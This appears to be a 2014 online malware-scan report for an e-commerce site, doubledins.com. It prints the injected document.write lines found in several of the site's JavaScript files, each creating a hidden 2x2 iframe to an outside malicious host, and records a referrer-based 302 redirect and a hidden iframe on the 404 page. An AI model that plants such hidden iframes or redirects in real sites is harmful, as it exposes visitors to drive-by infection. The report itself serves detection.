Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://doubledins.com/ (request imitating a visitor arriving from a search engine) GET / HTTP/1.1 Host: doubledins.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 17:05:24 GMT Location: http://hecodat.de/zwmd.html?h=922333 Server: Apache Content-Length: 284 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://doubledins.com/ | 200 OK Content-Length: 75672 Content-Type: text/html | clean |
http://doubledins.com/js/jquery/jquery-1.4.4.min.js | 200 OK Content-Length: 78754 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus scanners; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333></iframe>');
(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}fu b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}})})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333> | ||
http://doubledins.com/js/jquery/jquery.easing.1.3.js | 200 OK Content-Length: 5109 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus scanners; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=922333></iframe>');
jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cutedge.org/amef.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=922333> | ||
http://doubledins.com/js/tools.js | 200 OK Content-Length: 6714 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus scanners; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=922333></iframe>'); function ps_round(value, precision) { if (typeof(roundMode) == 'undefined') roundMode = 2; if (typeof(precision) == 'un url: baseDir + 'changecurrency.php', data: 'id_currency='+parseInt(id_currency), success: function(msg) { location.reload(true); } }); } function isArrowKey(k_ev) { var unicode=k_ev.keyCode? k_ev.keyCode : k_ev.charCode; if (unicode >= 37 && unicode <= 40) return true; } $().ready(function() { $('form').submit(function() { $(this).find('.hideOnSubmit').hide(); }); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://alicebangkokescorts.com/womd.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=922333> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333> | ||
http://doubledins.com/modules/blockcart/ajax-cart.js | 200 OK Content-Length: 25137 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus scanners; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=922333></iframe>');
var ajaxCart = { overrideButtonsInThePage : function(){ $('.ajax_add_to_cart_button').unbind('click').click(function(){ var idProduct = $(this).attr('rel').replace('ajax_id_product_', ''); if ($(this).attr('disabled') != 'disabled') ajaxCart.add(idProduct, null, false, this); retu $(this).hide(); }); $('.ajax_cart_no_product').show('slow'); } } }; $(document).ready(function(){ $('#block_cart_collapse').click(function(){ ajaxCart.collapse(); }); $('#block_cart_expand').click(function(){ ajaxCart.expand(); }); ajaxCart.overrideButtonsInThePage(); ajaxCart.refresh(); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cutedge.org/amef.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=922333> | ||
http://doubledins.com/themes/doubledins/js/tools/treeManagement.js | 200 OK Content-Length: 1995 Content-Type: application/javascript | clean |
http://doubledins.com/js/jquery/jquery.autocomplete.js | 200 OK Content-Length: 19939 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus scanners; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333></iframe>');
;(function($) { $.fn.extend({ autocomplete: function(urlOrData, options) { var isUrl = typeof urlOrData == "string"; options = $.extend({}, $.Autocompleter.defaults, { url: isUrl ? urlOrData : null, data: isUrl ? null : urlOrData, delay: isUrl ? $.Autocompleter.defaults.delay : if( field.createTextRange ){ var selRange = field.createTextRange(); selRange.collapse(true); selRange.moveStart("character", start); selRange.moveEnd("character", end); selRange.select(); } else if( field.setSelectionRange ){ field.setSelectionRange(start, end); } else { if( field.selectionStart ){ field.selectionStart = start; field.selectionEnd = end; } } field.focus(); }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333> | ||
http://doubledins.com/modules/lofcamera/js/slide.camera.js | 200 OK Content-Length: 39358 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus scanners; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://goldilockslc.com/mazf.html?j=922333></iframe>');
;(function(a){a.fn.camera=function(b,c){function bj(c){j.addClass("camerasliding");R=false;var d=parseFloat(a("div.cameraSlide.cameracurrent",k).index());if(c>0){var l=c-1}else if(d==B-1){var l=0}else{var l=d+1}var m=a(".cameraSlide:eq("+l+")",k);var n=a(".cameraSlide:eq("+(l+1)+")",k);a(".cameraContent",g).fadeOut( Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://goldilockslc.com/mazf.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://goldilockslc.com/mazf.html?j=922333> | ||
http://doubledins.com/js/jquery/jquery.validate.creditcard2-1.0.1.js | 200 OK Content-Length: 3960 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus scanners; see the reports below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333></iframe>');
 function validateCC(cardNo, cardName) { var cards = new Array(); cards[0] = { cardName: "Visa", lengths: "13,16", prefixes: "4", checkdigit: true }; cards[1] = { cardName: "MasterCard", lengths: "16", prefixes: "51,52,53,54,55", checkdigit: true }; cards[2] = { cardName: "DinersClub", lengths: prefix = cards[cardType].prefixes.split(","); for (i = 0; i < prefix.length; i++) { var exp = new RegExp("^" + prefix[i]); if (exp.test(cardNo)) prefixValid = true; } if (!prefixValid) { return false; } lengths = cards[cardType].lengths.split(","); for (j = 0; j < lengths.length; j++) { if (cardNo.length == lengths[j]) lengthValid = true; } if (!lengthValid) { return false; } return true; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=922333 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=922333> | ||
http://doubledins.com/themes/doubledins/js/menu/global_footer.js | 200 OK Content-Length: 4219 Content-Type: application/javascript | clean |
http://doubledins.com/themes/doubledins/js/slide/jquery.min.js | 200 OK Content-Length: 84893 Content-Type: application/javascript | clean |
http://doubledins.com/themes/doubledins/js/slide/slides.min.jquery.js | 200 OK Content-Length: 8574 Content-Type: application/javascript | clean |
http://doubledins.com//tracedseals.starfieldtech.com/siteseal/get?scriptId=cdSiteSeal1&cdSealType=Seal1&sealId=55e4ye7y7mb7301a20177cf52071d7dujpy7mb7355e4ye7d7ab18ce34dee30e9/ | 404 Not Found Content-Length: 2836 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.domus-vita.de/counter.php <iframe src="http://www.domus-vita.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://doubledins.com/test404page.js | 404 Not Found Content-Length: 2836 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 10x10 style: hidden src: http://www.domus-vita.de/counter.php <iframe src="http://www.domus-vita.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=doubledins.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://doubledins.com/
Result: doubledins.com is not infected or malware details are not published yet.
Result: doubledins.com is not infected or malware details are not published yet.